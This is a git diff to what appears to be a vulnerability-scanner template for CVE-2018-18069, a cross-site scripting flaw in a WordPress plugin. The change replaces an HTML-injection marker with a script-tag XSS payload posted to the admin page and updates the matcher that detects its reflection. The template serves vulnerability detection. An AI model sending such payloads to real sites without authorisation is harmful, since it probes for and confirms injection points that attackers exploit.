diff --git a/cves/2018/CVE-2018-18069.yaml b/cves/2018/CVE-2018-18069.yaml
index 15eb57f0b7..397133da4f 100644
--- a/cves/2018/CVE-2018-18069.yaml
+++ b/cves/2018/CVE-2018-18069.yaml
@@ -11,9 +11,9 @@ requests:
   - method: POST
     path:
       - "{{BaseURL}}/wp-admin/admin.php"
-    body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\"><html xmlns=\"hacked'
+    body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>'
 
     matchers:
       - type: dsl
         dsl:
-          - 'status_code==302 && contains(set_cookie, "_icl_current_admin_language") && contains(body, "hacked")'
+          - 'contains(tolower(all_headers_2), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\"><script>alert(0);</script>")'